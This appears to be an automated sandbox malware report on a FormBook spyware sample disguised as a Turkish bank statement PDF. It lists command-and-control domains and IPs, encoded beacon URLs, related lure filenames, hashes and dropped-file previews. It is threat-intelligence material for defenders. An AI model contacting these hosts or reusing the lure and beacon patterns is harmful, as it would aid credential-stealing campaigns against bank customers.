                          http://www.sem-jobs.com/ghii/explorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.yeah-go.com/ghii/explorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.energybig.xyzexplorer.exe, 00000004.00000002.588077771.000000000ED50000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.538156405.000000000ED56000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581575436.00000000063DC000.00000040.80000000.00040000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          unknown
                          https://search.yahoo.com?fr=crmas_sfpfsystray.exe, 00000005.00000002.576305318.00000000003E2000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.5.drfalse
                            high
                            http://www.ixirwholesale.xyz/ghii/explorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=-912K03JO.5.drfalse
                              high
                              https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchsystray.exe, 00000005.00000002.576305318.00000000003E2000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.5.drfalse
                                high
                                http://nsis.sf.net/NSIS_ErrorErrorHalkbank_Ekstre_20191102_073809_405251-PDF.com.exefalse
                                  high
                                  http://www.ladybillplanet.com/ghii/explorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://www.cutgang.netexplorer.exe, 00000004.00000002.588077771.000000000ED50000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.538156405.000000000ED56000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.genuineinsights.cloud/ghii/explorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://www.de-nagel.com/ghii/explorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=systray.exe, 00000005.00000002.576305318.00000000003E2000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.5.drfalse
                                    high
                                    http://www.nortonseecurity.com/ghii/explorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.octohoki.netexplorer.exe, 00000004.00000002.588077771.000000000ED50000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.538156405.000000000ED56000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    unknown
                                    https://ac.ecosia.org/autocomplete?q=-912K03JO.5.drfalse
                                      high
                                      https://search.yahoo.com?fr=crmas_sfpsystray.exe, 00000005.00000002.576305318.00000000003E2000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.5.drfalse
                                        high
                                        http://www.assilajamiart.com/ghii/explorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.genuineinsights.cloudexplorer.exe, 00000004.00000002.588077771.000000000ED50000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.538156405.000000000ED56000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: phishing
                                        unknown
                                        http://www.wenzid4.topexplorer.exe, 00000004.00000002.588077771.000000000ED50000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.538156405.000000000ED56000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.7dkjhk.comexplorer.exe, 00000004.00000002.588077771.000000000ED50000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.538156405.000000000ED56000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.wenzid4.top/ghii/explorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        unknown
                                        http://www.de-nagel.comexplorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.ladybillplanet.comexplorer.exe, 00000004.00000002.588077771.000000000ED50000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.538156405.000000000ED56000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.assilajamiart.comexplorer.exe, 00000004.00000002.588077771.000000000ED50000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.538156405.000000000ED56000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.fluxgreenn.space/ghii/explorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.ixirwholesale.xyzexplorer.exe, 00000004.00000002.588077771.000000000ED50000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.538156405.000000000ED56000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.yeah-go.comexplorer.exe, 00000004.00000002.588077771.000000000ED50000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.538156405.000000000ED56000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=-912K03JO.5.drfalse
                                          high
                                          http://www.bemmulher.online/ghii/explorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.hubyazilim.comexplorer.exe, 00000004.00000002.588077771.000000000ED50000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.538156405.000000000ED56000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.nortonseecurity.comexplorer.exe, 00000004.00000002.588077771.000000000ED50000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.538156405.000000000ED56000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs
                                          IPDomainCountryFlagASNASN NameMalicious
                                          107.148.8.96
                                          www.wenzid4.topUnited States
                                          54600PEGTECHINCUStrue
                                          194.102.227.30
                                          cutgang.netRomania
                                          12302VODAFONE_ROCharlesdeGaullenr15ROtrue
                                          184.94.215.91
                                          www.energybig.xyzUnited States
                                          394896VXCHNGE-NC01UStrue
                                          Joe Sandbox Version:36.0.0 Rainbow Opal
                                          Analysis ID:813159
                                          Start date and time:2023-02-22 09:02:13 +01:00
                                          Joe Sandbox Product:CloudBasic
                                          Overall analysis duration:0h 10m 18s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                          Number of analysed new started processes analysed:8
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:1
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • HDC enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample file name:Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe
                                          Detection:MAL
                                          Classification:mal100.troj.spyw.evad.winEXE@8/5@6/3
                                          EGA Information:
                                          • Successful, ratio: 100%
                                          HDC Information:
                                          • Successful, ratio: 71.8% (good quality ratio 65.5%)
                                          • Quality average: 74.2%
                                          • Quality standard deviation: 31.3%
                                          HCA Information:
                                          • Successful, ratio: 100%
                                          • Number of executed functions: 81
                                          • Number of non-executed functions: 67
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe
                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ctldl.windowsupdate.com
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          TimeTypeDescription
                                          09:03:33API Interceptor613x Sleep call for process: explorer.exe modified
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          107.148.8.96Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                          • www.wenzid4.top/ghii/?vpSIji=FtOCfte77t4rqa&kNvk2d=MOY5/0rZkCSn1x8B5kGxcu4kjN12BC26NMBU4rUAiJ09dU/WDm+Fx0Du9tK3DtQGeLOXEwxSHBLi0tUrRAF6AjHy/cvLKIMIEQ==
                                          Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                          • www.wenzid4.top/ghii/?1LM=MOY5/0rZkCSn1x8B5kGxcu4kjN12BC26NMBU4rUAiJ09dU/WDm+Fx0Du9tK3DtQGeLOXEwxSHBLi0tUrRAF6AgWuiPHLLIEAEQ==&kTj=94JTJ5e-oG
                                          T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                          • www.wenzid4.top/ghii/?9WI6t=QaRcz&Y5=MOY5/0rZkCSn1x8B5kGxcu4kjN12BC26NMBU4rUAiJ09dU/WDm+Fx0Du9tK3DtQGeLOXEwxSHBLi0tUrRAF6AjHy/cvLKIMIEQ==
                                          Akbank_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                          • www.wenzid4.top/ghii/?D-=o7lM_tn4_0HKLAP&gXaj8V=MOY5/0rZkCSn1x8B4WS0du0mnN5KW3C6NMBU4rUAiJ09dU/WDm+Fx0/u9tK3DtQGeLOXEwxSHBLi0tUrRAF3Ahbx+eXoKIAlFQ==
                                          T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                          • www.wenzid4.top/ghii/?IlOzNN=EyIBgfI12Z&uyr=MOY5/0rZkCSn1x8B5kGxcu4kjN12BC26NMBU4rUAiJ09dU/WDm+Fx0Du9tK3DtQGeLOXEwxSHBLi0tUrRAF3LCH1xNv1NtM5EA==
                                          captain.exeGet hashmaliciousFormBookBrowse
                                          • www.wenzid4.top/ghii/?Z-y-ON=FXxQJAlmPf&5B=MOY5/0rZkCSn1x8B5kGxcu4kjN12BC26NMBU4rUAiJ09dU/WDm+Fx0Du9tK3DtQGeLOXEwxSHBLi0tUrRAF6AjHy/cvLKIMIEQ==
                                          6TY2Qkw9KV.exeGet hashmaliciousFormBookBrowse
                                          • www.wenzid4.top/t36v/
                                          love pas.exeGet hashmaliciousFormBookBrowse
                                          • www.wenzid4.top/ghii/?krza2P=8Vw3GJ&ol9GzD=MOY5/0rZkCSn1x8B5kGxcu4kjN12BC26NMBU4rUAiJ09dU/WDm+Fx0Du9tK3DtQGeLOXEwxSHBLi0tUrRAF6AjHy/cvLKIMIEQ==
                                          Halkbank_Ekstre_20191102_073809_405251-PDF.exeGet hashmaliciousFormBookBrowse
                                          • www.wenzid4.top/ghii/?PCWgxGWo=MOY5/0rZkCSn1x8B5kGxcu4kjN12BC26NMBU4rUAiJ09dU/WDm+Fx0Du9tK3DtQGeLOXEwxSHBLi0tUrRAF6AjHy/cvLKIMIEQ==&9KUw=bksF2HZ2yak7Rbe
                                          194.102.227.30Payment INV NO. 230203-1USD.exeGet hashmaliciousFormBookBrowse
                                            Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                              Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                                T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                                  Akbank_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                                    T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                                      T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                                        cnf13429226.vbsGet hashmaliciousFormBookBrowse
                                                          captain.exeGet hashmaliciousFormBookBrowse
                                                            love pas.exeGet hashmaliciousFormBookBrowse
                                                              some one.exeGet hashmaliciousFormBookBrowse
                                                                Halkbank_Ekstre_20191102_073809_405251-PDF.exeGet hashmaliciousFormBookBrowse
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  www.genuineinsights.cloudHalkbank_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                                                  • 66.96.162.149
                                                                  T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                                                  • 66.96.162.149
                                                                  Akbank_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                                                  • 66.96.162.149
                                                                  T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                                                  • 66.96.162.149
                                                                  T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                                                  • 66.96.162.149
                                                                  captain.exeGet hashmaliciousFormBookBrowse
                                                                  • 66.96.162.149
                                                                  file.exeGet hashmaliciousAgentTesla, FormBookBrowse
                                                                  • 66.96.162.149
                                                                  0900664 MOHS Tender..jsGet hashmaliciousFormBookBrowse
                                                                  • 66.96.162.149
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  PEGTECHINCUSHalkbank_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                                                  • 107.148.8.96
                                                                  ijUbCPKxVM.exeGet hashmaliciousUnknownBrowse
                                                                  • 107.148.49.247
                                                                  disMNajJNY.exeGet hashmaliciousFormBookBrowse
                                                                  • 154.195.83.5
                                                                  Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                                                  • 107.148.8.96
                                                                  T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                                                  • 107.148.8.96
                                                                  Akbank_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                                                  • 107.148.8.96
                                                                  ZiraatEkstre_202301.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 107.149.230.42
                                                                  T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                                                  • 107.148.8.96
                                                                  Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 154.195.83.1
                                                                  http://kickboxingathome.comGet hashmaliciousUnknownBrowse
                                                                  • 104.219.208.2
                                                                  http://137.175.17.190/jawsGet hashmaliciousUnknownBrowse
                                                                  • 137.175.17.190
                                                                  T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                                                  • 107.148.8.96
                                                                  Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 154.195.83.1
                                                                  captain.exeGet hashmaliciousFormBookBrowse
                                                                  • 107.148.8.96
                                                                  TRANSFER CONFIRMATION.exeGet hashmaliciousFormBookBrowse
                                                                  • 198.2.192.82
                                                                  4iLDIlbK8X.elfGet hashmaliciousMiraiBrowse
                                                                  • 45.205.88.130
                                                                  TT Swift($42,072)2.2.23.exeGet hashmaliciousFormBookBrowse
                                                                  • 107.149.76.98
                                                                  y2OSL6rKkW.exeGet hashmaliciousFormBookBrowse
                                                                  • 142.4.98.152
                                                                  6TY2Qkw9KV.exeGet hashmaliciousFormBookBrowse
                                                                  • 107.148.8.96
                                                                  Pyt5lqAgHP.elfGet hashmaliciousUnknownBrowse
                                                                  • 108.186.132.182
                                                                  VODAFONE_ROCharlesdeGaullenr15ROPayment INV NO. 230203-1USD.exeGet hashmaliciousFormBookBrowse
                                                                  • 194.102.227.30
                                                                  Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                                                  • 194.102.227.30
                                                                  Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                                                  • 194.102.227.30
                                                                  T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                                                  • 194.102.227.30
                                                                  Akbank_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                                                  • 194.102.227.30
                                                                  T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                                                  • 194.102.227.30
                                                                  i2hCoUCBwo.elfGet hashmaliciousMirai, MoobotBrowse
                                                                  • 81.12.165.53
                                                                  T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                                                  • 194.102.227.30
                                                                  cnf13429226.vbsGet hashmaliciousFormBookBrowse
                                                                  • 194.102.227.30
                                                                  captain.exeGet hashmaliciousFormBookBrowse
                                                                  • 194.102.227.30
                                                                  W3NFvcKgsq.elfGet hashmaliciousMiraiBrowse
                                                                  • 81.12.165.89
                                                                  love pas.exeGet hashmaliciousFormBookBrowse
                                                                  • 194.102.227.30
                                                                  some one.exeGet hashmaliciousFormBookBrowse
                                                                  • 194.102.227.30
                                                                  Halkbank_Ekstre_20191102_073809_405251-PDF.exeGet hashmaliciousFormBookBrowse
                                                                  • 194.102.227.30
                                                                  YYwHP01CiA.elfGet hashmaliciousUnknownBrowse
                                                                  • 136.255.26.39
                                                                  DeGHXF1WPn.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                  • 81.12.215.12
                                                                  AqLkwwh89S.elfGet hashmaliciousMiraiBrowse
                                                                  • 136.255.15.144
                                                                  ZBdhdOCSw8.elfGet hashmaliciousMiraiBrowse
                                                                  • 46.97.220.69
                                                                  zMxKF1sZ6K.dllGet hashmaliciousWannacryBrowse
                                                                  • 46.97.87.42
                                                                  boatnet.x86.elfGet hashmaliciousMiraiBrowse
                                                                  • 46.97.38.82
                                                                  No context
                                                                  No context
                                                                  Process:C:\Windows\SysWOW64\systray.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                                  Category:dropped
                                                                  Size (bytes):94208
                                                                  Entropy (8bit):1.287139506398081
                                                                  Encrypted:false
                                                                  SSDEEP:192:Qo1/8dpUXbSzTPJPF6n/YVuzdqfEwn7PrH944:QS/indc/YVuzdqfEwn7b944
                                                                  MD5:292F98D765C8712910776C89ADDE2311
                                                                  SHA1:E9F4CCB4577B3E6857C6116C9CBA0F3EC63878C5
                                                                  SHA-256:9C63F8321526F04D4CD0CFE11EA32576D1502272FE8333536B9DEE2C3B49825E
                                                                  SHA-512:205764B34543D8B53118B3AEA88C550B2273E6EBC880AAD5A106F8DB11D520EB8FD6EFD3DB3B87A4500D287187832FCF18F60556072DD7F5CC947BB7A4E3C3C1
                                                                  Malicious:false
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe
                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):52224
                                                                  Entropy (8bit):6.0647504007724224
                                                                  Encrypted:false
                                                                  SSDEEP:768:p/vwmWseh5kTzqdlP8zJRZ5sGX5zUJ/4nVnYu6VlPhmEDyPnyndhdqkMRO:pHe5kCdlP89Vs05zUEVnEPapO
                                                                  MD5:80B16EC75046C2265A49A9AD7196B5BD
                                                                  SHA1:BA9C4BCDF5193C005C7BAA97F71CDD950C57E987
                                                                  SHA-256:CDC8B6A7773A4C5B5EB062005D000A94AC34C419BCB36C9E6DC20BB511702C38
                                                                  SHA-512:0E534101718120FB9FD4F82FE2636431C6565D939BF74C2D8ACEB215F59FD2339271A57EB973F4DBF704C2141E6EF8428EC7C29FDB326B3338ECE2B55B15D28F
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 23%
                                                                  Reputation:low
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........mK................................................V...................Rich............................PE..L......c.....................p....................@.......................... ..............................................L...........................................................................................|............................text............................... ..`.rdata...-..........................@..@.data....A..........................@...................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):5536
                                                                  Entropy (8bit):7.16396267174471
                                                                  Encrypted:false
                                                                  SSDEEP:96:Farc6oYneg/DrYuZk2XO5oSwYriHmACTNEP5BLZXfuFfi3tvUX7fKIscEWj:FarcRqhhX1S9X+JfuFWvUX7fm+
                                                                  MD5:2785AE8227655179C247F23866D15C29
                                                                  SHA1:8A4BEEC83C988550740882670BAAB3707C856ADE
                                                                  SHA-256:CF9D9F1E30A9DB7DB9BCCBDFA7D230529A84EB7AE1F0C4BAE118DF3EB865ADF6
                                                                  SHA-512:84244E31B410436A84B8D6A7628C0BDF0E02D320C186B124B65BFC29C248A7A30D2F0A29C14D0F096583BBCEA0FDFB77A44244D34C2CB3143969BE83D5517B4A
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:.005m..f.F<...05o.:......?v>.3.3.<......M.knl.02a..c.E<...42c. ......4.D63.6.3.?.....E.gni.53P..805.p8.q?.2.8.u .a..beabo.H0..v..v.@3.`..i/7.p.6.t(2..g.}.u<..G-.0.3.h.f....w8L$.m.r.D;F...okc..m.;4.q.?.<@.4.0...m..u<f...@%.`4..D'd.O$..A5..=..<r..4M.knl.82a..Q..401ec.t4.M4...D;.D..d580..E9....E....3.u.mje.18e..`W..480.x<.p=.4.4.p-P..6.c.!....D%.|.eX.....+..t..0....e.a..`beP..580.p=.t>.8.5.p,XE..Md.....M9..e...@4......F1..u.|c.....Lq.}<...v<+480.}<;.&<.>..r.^.q8F0....q.^.q8F0...^..M...3uc.....}<F...kloe.=8e...548.r...t..w.(058.q..v..I.0A..q..34.q.p.}..u.{.w....}.p013......u.L.4F".u..04.t.t.q..p.x.u....q.8580..Y...}..E.4D'.q..80.}.t.t..w.p.p...X+AK..M......v.ZXK.J.E.....}.]..O.F.....u.X_.M.M......H...X...K.D.....}.\&....A..B....G...P5..O.E..P....\...Y...K.E..a....B...].4.T.4.q0.p..q..~<1|..x.q.>.t&.u.|1,.t..w.pe..\...w.p..u.T.4.Q.0.}.;.q%..5M%.}.;.qm..tL9.}.5013.6.].5.u...K...P3480..u...dR0.m...D4...B358.q.0342.}.e......dX4R0]<048[3^2^8Z5..p...d.a..
                                                                  Process:C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):210476
                                                                  Entropy (8bit):7.998822874829815
                                                                  Encrypted:true
                                                                  SSDEEP:6144:MJcJ84OAnak2Maeho6ISP5+S7II/UYbAePT:uaNFnak2IobeN7nMiL
                                                                  MD5:B24DF54F2D2625AE59AB9FA9467E4383
                                                                  SHA1:08FDAB8B985747437FC20E4C0F82EBBC84D1BF75
                                                                  SHA-256:D471C46CE097D9C33365B30B5633876E5FDDC20A77C19DBB34FD8C1EF3AFDA47
                                                                  SHA-512:6C18C53DCB94BD0ED4D481B3B962D42558AB831AB501D91F59040E9119800AAEF4F2DE41237A4182FD5CC386A9C37091A43B621AB1C40EBC62C86CC3E0A27183
                                                                  Malicious:false
                                                                  Preview:mY/*.:+.{.....0..W..BVB*..0.8.^..M.F....Xi...;..?N.0..".Y..m...eE...+TA).p.2..Q.5..Tr..../.!p..s.|{k....I.7C.....tE.[...K^3<.}o.....P2.a_.HM...P..BXR..........i...X....S".|...?.M...r._r@.>7.-...Q.~.<N!..]mG.....df..1.....9..V>...I.v..`AB'.Q.|..:+...ga...!8A..- .~..({..n.^5.M..F.H..xi...;.+?N.0.."C.Y._.~..xi.E.1#.._]....Hy...ay.'.!.PR.........2.E.uD.J..tE.[.Q....>/.G4s]........D.J...,.D.2.[!..z...f<..X....S"..sNv..M......m.Q..O...Q.~..<m.}..]7.s_...df..1.....Y..V.y..IX.v..`A.'...|..:+.{.ga...!8...1 .~..(@.8.^..M.F....Xi...;..?N.0.."C.Y._.~..xi.E.1#.._]....Hy...ay.'.!.PR.........2.E.uD.J..tE.[.Q....>/.G4s]........D.J...,.D.2.[!..z...f<..X....S".|...?.M.S.r..<m.Q~-O...Q.~..<m.}..]m.s....df..1.....Y..V.y..IX.v..`A.'...|..:+.{.ga...!8...1 .~..(@.8.^..M.F....Xi...;..?N.0.."C.Y._.~..xi.E.1#.._]....Hy...ay.'.!.PR.........2.E.uD.J..tE.[.Q....>/.G4s]........D.J...,.D.2.[!..z...f<..X....S".|...?.M.S.r..<m.Q~-O...Q.~..<m.}..]m.s....df..1
                                                                  Process:C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):278142
                                                                  Entropy (8bit):7.732995463417942
                                                                  Encrypted:false
                                                                  SSDEEP:6144:PJcJ84OAnak2Maeho6ISP5+S7II/UYbAeP8pe4h:haNFnak2IobeN7nMikpeg
                                                                  MD5:09F5F64DC0975EECA8FC7F45D5763213
                                                                  SHA1:D952E02102188966F3D488448AC06700D07BE917
                                                                  SHA-256:53906DA2E76C0DF670C69B1781BECEB42839CAB8E09F3B995870D76D5CFA4E57
                                                                  SHA-512:6550F2E3D6BDB4FFF8C232CE9A0810C36B9A0FE29A0E63A30028724C3D84690F0E1AC3EFC2E1F452B72E5BE1FEBDE0E3322235CE87AE764A2700718ED60BAAB1
                                                                  Malicious:false
                                                                  Preview:.&......,................................%.......&..............................................................................:...........................................................................................................................................................G...................j...........................................................................................................................................Y...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                  Entropy (8bit):7.917627825605975
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                  File name:Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe
                                                                  File size:277853
                                                                  MD5:f4caa699ad1907e12e6c5809d1a9af5e
                                                                  SHA1:e1c7ee1bce916811e26d759770636a84bc760c3b
                                                                  SHA256:e14890d40be2216c014475cac45debe0d23a1e6eb333908c814034b1df73b73d
